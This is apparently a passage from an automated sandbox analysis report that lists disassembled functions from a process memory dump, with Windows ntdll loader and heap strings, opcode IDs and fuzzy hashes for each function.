                                                    • Instruction Fuzzy Hash: C8C281716283419FD725CF28C891BABBBE5BF88B54F048A2DFA89C7241D774D844CB52
                                                    Function 0129A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: FilterFullPath$UseFilter$\??\
                                                    • API String ID: 0-2779062949
                                                    • Opcode ID: f1e5f92e61d24b8965d97ce344c6776af0f7014af5dce5fc6ecea8167617a337
                                                    • Instruction ID: 72a50ad58d71481aeb76ff1e77c61ec7c0a9737b170656c9b5fc21829de33343
                                                    • Opcode Fuzzy Hash: f1e5f92e61d24b8965d97ce344c6776af0f7014af5dce5fc6ecea8167617a337
                                                    • Instruction Fuzzy Hash: DCA14A75D2162A9BDF31DB68CC88BAAB7B8EF44710F1001E9EA09A7250D7759E84CF50
                                                    Function 012C0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 0130A121
                                                    • Failed to allocated memory for shimmed module list, xrefs: 0130A10F
                                                    • LdrpCheckModule, xrefs: 0130A117
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-161242083
                                                    • Opcode ID: 6607f0cc58a9689943498a15df44ae0e3bdf08d7d46d981ac9023886a103e4eb
                                                    • Instruction ID: 2d95041d0a6264bcacfd82fb02301a0da25cb0e2a8301688b006fe9c101dea4b
                                                    • Opcode Fuzzy Hash: 6607f0cc58a9689943498a15df44ae0e3bdf08d7d46d981ac9023886a103e4eb
                                                    • Instruction Fuzzy Hash: 1471D0B4A10306DFDB29DF68C991BBEB7F8FB44708F14412DE602AB251E735AA41CB54
                                                    Function 012B0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                    • API String ID: 0-1334570610
                                                    • Opcode ID: 43712c23731b6fa186f84979e7716aa5d69c2b7ab62b12cca0f42470f85653e1
                                                    • Instruction ID: c6aff0262fe8af64a9a8f89d5bb2073871785d259f333ba7e20b75a9d3fd8a43
                                                    • Opcode Fuzzy Hash: 43712c23731b6fa186f84979e7716aa5d69c2b7ab62b12cca0f42470f85653e1
                                                    • Instruction Fuzzy Hash: E761CF70620302DFDB2ACF28C491BABBBF5FF44748F148599E5598B292D770E881CB95
                                                    Function 012DC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 013182E8
                                                    • Failed to reallocate the system dirs string !, xrefs: 013182D7
                                                    • LdrpInitializePerUserWindowsDirectory, xrefs: 013182DE
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-1783798831
                                                    • Opcode ID: 04d37ed9feb6fa26b163c6511b6a6e3ce338053f47aed9c1e244875c253e09fc
                                                    • Instruction ID: 5fae109c41dfdfc9a226464ef09b57978fc7e2d7453d36b44931397a733bbf28
                                                    • Opcode Fuzzy Hash: 04d37ed9feb6fa26b163c6511b6a6e3ce338053f47aed9c1e244875c253e09fc
                                                    • Instruction Fuzzy Hash: 934121B1521301EBDB25EB68D885BAB77ECAF48764F01092EFA48D3294E771D800CB91
                                                    Function 0135C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • PreferredUILanguages, xrefs: 0135C212
                                                    • @, xrefs: 0135C1F1
                                                    • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0135C1C5
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                    • API String ID: 0-2968386058
                                                    • Opcode ID: 0553203751a00426568ed294a26071d05bae4ec4e62e735b0159dd5de8d9e7ad
                                                    • Instruction ID: 1292161a6f2cf19b9af50684d7cb89b676ffa2192b55942fee4a8f174af477ff
                                                    • Opcode Fuzzy Hash: 0553203751a00426568ed294a26071d05bae4ec4e62e735b0159dd5de8d9e7ad
                                                    • Instruction Fuzzy Hash: C3416375E10309EBDF51DED8C891FEEBBBCAB14B4CF14416AEA05B7240D7749A448B90
                                                    Function 01334144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                    • API String ID: 0-1373925480
                                                    • Opcode ID: 4c0c2241e50315929d904814814933a05aea244881a7dc623787ea9dd2d5b9e5
                                                    • Instruction ID: df7c651e8ea1b2b47858b489d7f6d860ce329c92e1ad33c4cc5d1a93f009076f
                                                    • Opcode Fuzzy Hash: 4c0c2241e50315929d904814814933a05aea244881a7dc623787ea9dd2d5b9e5
                                                    • Instruction Fuzzy Hash: CF41FF32A10659CBEB26DBE8C844BADBBB8FF95348F24045AD941FB791DB348901CB54
                                                    Function 01324755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01324888
                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 01324899
                                                    • LdrpCheckRedirection, xrefs: 0132488F
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                    • API String ID: 0-3154609507
                                                    • Opcode ID: b2c7ad165838a7e56ac19d238d33e18c1c1498de7b235ca050492e4eff6809bb
                                                    • Instruction ID: 9b667d4c2a82d5bed92278418ad49d31697adc9fb99ee86c2b61d4ae7f0b9a89
                                                    • Opcode Fuzzy Hash: b2c7ad165838a7e56ac19d238d33e18c1c1498de7b235ca050492e4eff6809bb
                                                    • Instruction Fuzzy Hash: 1D41BE72A242719BCB21EF6CD840A267FE8BF49B58F060569ED699B311D772D800CB91
                                                    Function 012B0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                    • API String ID: 0-2558761708
                                                    • Opcode ID: 347758de7470c21b4a55f74c7b57257e6112124a5872192eb529962bf1b13f5b
                                                    • Instruction ID: bf2583a1f3f82af69d0ac12e7711118456d90cffad370db9ccbe0d7293d9b12e
                                                    • Opcode Fuzzy Hash: 347758de7470c21b4a55f74c7b57257e6112124a5872192eb529962bf1b13f5b
                                                    • Instruction Fuzzy Hash: 2411C0313351429FDB2ACB18C495BBAB3A8AF40B59F158159F4069B691EB30D840CB54
                                                    Function 012B03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: #%u
                                                    • API String ID: 48624451-232158463
                                                    • Opcode ID: 0ca2541f83fa045fe0748bcf85d99558cf26453f2c944f7fc14f2531fddb98f1
                                                    • Instruction ID: a446487fb6079a693f5fd6232310fb0d077cbfad36858772d65822b694c3b9c0
                                                    • Opcode Fuzzy Hash: 0ca2541f83fa045fe0748bcf85d99558cf26453f2c944f7fc14f2531fddb98f1
                                                    • Instruction Fuzzy Hash: A0714D71A1014A9FDB06DF98C994BAEB7F8FF08744F144065EA05E7251EA38EE05CB64
                                                    Function 012AA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • LdrResSearchResource Enter, xrefs: 012AAA13
                                                    • LdrResSearchResource Exit, xrefs: 012AAA25
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                    • API String ID: 0-4066393604
                                                    • Opcode ID: 89ce423015bb5906aef44b86edf35fd8b5e5349765d749ae24496085cb5ae878
                                                    • Instruction ID: f11ede663ccb09e5a9ea7548fb6682fa1c1ca7ff384c90e57c7eefe7f8d484cb
                                                    • Opcode Fuzzy Hash: 89ce423015bb5906aef44b86edf35fd8b5e5349765d749ae24496085cb5ae878
                                                    • Instruction Fuzzy Hash: 51E1A571E202199FEB22CF99C994BAEBBF9FF18354F50442AE901E7281E774D940CB50
                                                    Function 0136A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: `$`
                                                    • API String ID: 0-197956300
                                                    • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                    • Instruction ID: 95440620b5c19d16c140e4088e1f42bad6c5564f98193c9a130849c75e924f8e
                                                    • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                    • Instruction Fuzzy Hash: 41C1E2312043469BE725CF28C841B6BBBE9BFC4318F188A2CF696EB294D774D905CB51
                                                    Function 0131E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID: Legacy$UEFI
                                                    • API String ID: 2994545307-634100481
                                                    • Opcode ID: 073dfb035bffb69fd21ecce6280dd9b93d59724dec72558eec1a83f1b35e95fc
                                                    • Instruction ID: d877a86f3f7b0fb25655fa65ab8b6ee6c1eb7764de9cda3c11d1f6244a2863ea
                                                    • Opcode Fuzzy Hash: 073dfb035bffb69fd21ecce6280dd9b93d59724dec72558eec1a83f1b35e95fc
                                                    • Instruction Fuzzy Hash: 3A615E71E102199FEB19DFA8C840BADBBF9FB48704F14407DEA59EB295D732A940CB50
                                                    Function 013443D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$MUI
                                                    • API String ID: 0-17815947
                                                    • Opcode ID: 4f302e938fb252acc6cbcf066be84533283fd71e90a4400130e977296e1dff7b
                                                    • Instruction ID: 9f8d1ef4853555d6c228c03389c08c385cd37e4b29a11e7645b7ee3b6d57e5f2
                                                    • Opcode Fuzzy Hash: 4f302e938fb252acc6cbcf066be84533283fd71e90a4400130e977296e1dff7b
                                                    • Instruction Fuzzy Hash: B9510771E1021DAFDF11DFA9CC84BEEBBFCAB44758F100569E615B7290D670A905CBA0
                                                    Function 012A04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 012A063D
                                                    • kLsE, xrefs: 012A0540
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                    • API String ID: 0-2547482624
                                                    • Opcode ID: 0a999f0509883676219a1bc0bfbf25977653170c8a096945506c42321f2229b6
                                                    • Instruction ID: 2b2a897eea450ec24adfdcbeb508d6b6ed9266158d96368e49f1cf78a9981ac5
                                                    • Opcode Fuzzy Hash: 0a999f0509883676219a1bc0bfbf25977653170c8a096945506c42321f2229b6
                                                    • Instruction Fuzzy Hash: 8051ACB15247438FD724EF69C4406A7BBE4AF84708F50483EEAEA87241E770E545CB9A
                                                    Function 012AA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • RtlpResUltimateFallbackInfo Enter, xrefs: 012AA2FB
                                                    • RtlpResUltimateFallbackInfo Exit, xrefs: 012AA309
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                    • API String ID: 0-2876891731
                                                    • Opcode ID: 324548ccf7112adbbdd152ad05a6e02ef11482b3b254938373c0bff9c7323f46
                                                    • Instruction ID: 8f799578399cab6d51ca40d875d671a9882acdb4280f2c2133739a4682e2453a
                                                    • Opcode Fuzzy Hash: 324548ccf7112adbbdd152ad05a6e02ef11482b3b254938373c0bff9c7323f46
                                                    • Instruction Fuzzy Hash: 3A41CF30A24A5ADBEB16CF6DC894B6EBBF4FF84704F1440A5EA01DB291E3B5D900CB50
                                                    Function 012DA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID: Cleanup Group$Threadpool!
                                                    • API String ID: 2994545307-4008356553
                                                    • Opcode ID: 99697027cb34ea42b1400a55b5f998e04e021b058fb2b1547ba642b9dea62084
                                                    • Instruction ID: 4be5f52c8ed8b48ea8a3c65a9cd1059cd7127c788bf867d176f15edd4786ac9a
                                                    • Opcode Fuzzy Hash: 99697027cb34ea42b1400a55b5f998e04e021b058fb2b1547ba642b9dea62084
                                                    • Instruction Fuzzy Hash: 1701F4B2264744EFE311DF14CD46F26B7E8E794725F048939B648C7190E3B4D804CB86
                                                    Function 012AC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: MUI
                                                    • API String ID: 0-1339004836
                                                    • Opcode ID: 555e0cdb3d08d517b7cc5338efcb14f2f83b0d5085fc5d475202b94aaa5b752e
                                                    • Instruction ID: 863bc4a5cb50049f4f3df88b68916e070544acaacaf600e718686018a3a20163
                                                    • Opcode Fuzzy Hash: 555e0cdb3d08d517b7cc5338efcb14f2f83b0d5085fc5d475202b94aaa5b752e
                                                    • Instruction Fuzzy Hash: 3A827C75E202198FEB25CFA8C880BEDBBB5FF48310F54816AEA19AB751D7709941CF50
                                                    Function 01326420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID: 0-3916222277
                                                    • Opcode ID: 3a5be0288bf0cf5e1b3ce9999143181a5b5bea9d4a168913eabd574b2956f4dd
                                                    • Instruction ID: 9003dd1b5348f50a352353df46deca179f8dbc438a4c5f59e65b3f549fbb7061
                                                    • Opcode Fuzzy Hash: 3a5be0288bf0cf5e1b3ce9999143181a5b5bea9d4a168913eabd574b2956f4dd
                                                    • Instruction Fuzzy Hash: 409174B1910229AFEB21EF95CC85FAE7BB8EF14B54F104155FB01AB190D774AD04CB90
                                                    Function 0134E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID: 0-3916222277
                                                    • Opcode ID: c7a778044852059cc8f3a7d58b5db7f98509bcaa9493062bdc2190114dcf1882
                                                    • Instruction ID: f84dcccdb406f2964547e9e34aabe2644b868e1bdcd3556b435409a63b6bad8f
                                                    • Opcode Fuzzy Hash: c7a778044852059cc8f3a7d58b5db7f98509bcaa9493062bdc2190114dcf1882
                                                    • Instruction Fuzzy Hash: ED918F72910649BFDB26ABA5DC84FEFBBB9FF55748F100029F501A7250E778A901CB90
                                                    Function 012DA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: GlobalTags
                                                    • API String ID: 0-1106856819
                                                    • Opcode ID: 0c8beab8328416843eb8e13beaba365417e05789ddb8b013ea4ae573c872da08
                                                    • Instruction ID: 78f06120e95582ac7359ca8ded13c2d1962694f48cc577c5c893ee15b3d9d061
                                                    • Opcode Fuzzy Hash: 0c8beab8328416843eb8e13beaba365417e05789ddb8b013ea4ae573c872da08
                                                    • Instruction Fuzzy Hash: FC7180B5E0021ACFDF28CF9CD591AADBBB1BF88714F14812EE905A7245E7B19941CB50
                                                    Function 01344978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: .mui
                                                    • API String ID: 0-1199573805
                                                    • Opcode ID: e7d3660928202ef1737245f16da4205463189b8dfc393eb7c5a00ed63c289419
                                                    • Instruction ID: 5d7f1123de0ae5fbbd480db695ef7ffb340c9def6016aed7fa7c4644316192b0
                                                    • Opcode Fuzzy Hash: e7d3660928202ef1737245f16da4205463189b8dfc393eb7c5a00ed63c289419
                                                    • Instruction Fuzzy Hash: 3F519372D1022A9BDF10DF99D940BAEBBF8AF04758F054139EA11BB240D738AC01CBE4
                                                    Function 012BE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: EXT-
                                                    • API String ID: 0-1948896318
                                                    • Opcode ID: 0bec5c9219768c0c16e4fe987f07d647e7878bc4508f61df3549df0257b1df17
                                                    • Instruction ID: ae67c54eb3e089ed7d83a6b9a5446da9d2049d32c6aa0426a9d4fd18fb2b0406
                                                    • Opcode Fuzzy Hash: 0bec5c9219768c0c16e4fe987f07d647e7878bc4508f61df3549df0257b1df17
                                                    • Instruction Fuzzy Hash: D441B372528302ABD715DA75C880BEBB7E8AF98784F450A2DF684D7140E674D904C793
                                                    Function 0131C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: BinaryHash
                                                    • API String ID: 0-2202222882
                                                    • Opcode ID: 4dd24f75e157d9e3839e10701d3a090cd757ce8a21e8075f15477d77129c06c1
                                                    • Instruction ID: cc51d99bddd9ca2574745f50b11037f2787156c1db97c8acc4981c880b6617ff
                                                    • Opcode Fuzzy Hash: 4dd24f75e157d9e3839e10701d3a090cd757ce8a21e8075f15477d77129c06c1
                                                    • Instruction Fuzzy Hash: 344154B1D5012DABDF21DA54CC84FEEBB7CAB44718F4045A5EA08A7144DB709E89CF94
                                                    Function 01336B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: #
                                                    • API String ID: 0-1885708031
                                                    • Opcode ID: 119b87fabfedb641c6ebb54b7089b0e55829c207cd16651f4f06057ca0626143
                                                    • Instruction ID: 299319f2de6dd81b9c74503574f56a273c85efd0fbea8d38f41b3eae0704f2c8
                                                    • Opcode Fuzzy Hash: 119b87fabfedb641c6ebb54b7089b0e55829c207cd16651f4f06057ca0626143
                                                    • Instruction Fuzzy Hash: 58314C71A00749AFDF22DB69C855BEE7BB8DF84708F504028EA419B282C775DE05CB58
                                                    Function 0131CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: BinaryName
                                                    • API String ID: 0-215506332
                                                    • Opcode ID: 166527cdca6568100f6c1ab0e9435f2ffb0d73c5b3d1a2e9b29ae3ae10ef3337
                                                    • Instruction ID: 20ef9a04011c06ef982dfa85e52f768cdc39b9382176b7bdd9ba10948b31f551
                                                    • Opcode Fuzzy Hash: 166527cdca6568100f6c1ab0e9435f2ffb0d73c5b3d1a2e9b29ae3ae10ef3337
                                                    • Instruction Fuzzy Hash: 73310536940519AFEB1ADA58C845EBFBB78FB80754F018129E901E7250D730AE00D7E0
                                                    Function 013206F1 Relevance: 1.3, Strings: 1, Instructions: 79COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: `-
                                                    • API String ID: 0-2038111592
                                                    • Opcode ID: 6792ca315700078e04c5a88999ba5abd8bdd3ca22cab6b069f169c6c65972efd
                                                    • Instruction ID: d2064143d9b630e9f05b23467eab3b8407a7c9328fe26d008dcc4261dc10cc6d
                                                    • Opcode Fuzzy Hash: 6792ca315700078e04c5a88999ba5abd8bdd3ca22cab6b069f169c6c65972efd
                                                    • Instruction Fuzzy Hash: 0C218D71910229ABCF25EF59C881ABEB7F8FF48744F540069F941AB250D738AD52CBA0
                                                    Function 01320946 Relevance: 1.3, Strings: 1, Instructions: 70COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: `-
                                                    • API String ID: 0-2038111592
                                                    • Opcode ID: 7e10b9fc46bb7cfbff23bfbe65719a1a2a4eb4fb4c622d19566079ddcefe934d
                                                    • Instruction ID: 1839694f06507a456fbb269e67d9fbc417cead2e09c3737ebe8398e46c39be59
                                                    • Opcode Fuzzy Hash: 7e10b9fc46bb7cfbff23bfbe65719a1a2a4eb4fb4c622d19566079ddcefe934d
                                                    • Instruction Fuzzy Hash: E42148B1E10218ABCB24DFAAD880AAEFBF8FF98704F10012FE405A7254D7709945CF60
                                                    Function 0132892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0132895E
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                    • API String ID: 0-702105204
                                                    • Opcode ID: b070fb8cd30150f955688b7d48990200096ab59755f41991a9bdc4d2ebd0b209
                                                    • Instruction ID: fb1a96db81324ee40d244c557c1fd7fce682cde41dff86aa12b97e4877a173d1
